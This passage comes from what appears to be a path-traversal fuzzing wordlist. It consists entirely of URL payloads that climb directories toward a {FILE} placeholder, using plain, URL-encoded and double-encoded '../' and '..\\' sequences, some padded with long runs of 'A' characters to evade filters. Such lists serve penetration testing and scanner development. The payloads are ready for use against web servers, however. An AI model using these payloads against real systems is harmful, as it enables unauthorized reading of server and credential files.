252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}\n/..\\{FILE}\n/..\\..\\{FILE}\n/..\\..\\..\\{FILE}\n/..\\..\\..\\..\\{FILE}\n/..\\..\\..\\..\\..\\{FILE}\n/..\\..\\..\\..\\..\\..\\{FILE}\n/..\\..\\..\\..\\..\\..\\..\\{FILE}\n/..\\..\\..\\..\\..\\..\\..\\..\\{FILE}\n/..%5c{FILE}\n/..%5c..%5c{FILE}\n/..%5c..%5c..%5c{FILE}\n/..%5c..%5c..%5c..%5c{FILE}\n/..%5c..%5c..%5c..%5c..%5c{FILE}\n/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}\n/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}\n/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}\n/%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}\n/%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}\n/..%255c{FILE}\n/..%255c..%255c{FILE}\n/..%255c..%255c..%255c{FILE}\n/..%255c..%255c..%255c..%255c{FILE}\n/..%255c..%255c..%255c..%255c..%255c{FILE}\n/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}\n/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}\n/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}\n/%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}\n/%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}\n/\\../{FILE}\n/\\../\\../{FILE}\n/\\../\\../\\../{FILE}\n/\\../\\../\\../\\../{FILE}\n/\\../\\../\\../\\../\\../{FILE}\n/\\../\\../\\../\\../\\../\\../{FILE}\n/\\../\\../\\../\\../\\../\\../\\../{FILE}\n/\\../\\../\\../\\../\\../\\../\\../\\../{FILE}\n//..\\{FILE}\n//..\\/..\\{FILE}\n//..\\/..\\/..\\{FILE}\n//..\\/..\\/..\\/..\\{FILE}\n//..\\/..\\/..\\/..\\/..\\{FILE}\n//..\\/..\\/..\\/..\\/..\\/..\\{FILE}\n//..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}\n//..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}\n/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}\n/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}\n/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}\n/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}\n/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}\n/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}\n/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}\n/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}\n/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\..\\{FILE}\n/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\..\\..\\{FILE}\n/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\..\\..\\..\\{FILE}\n/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA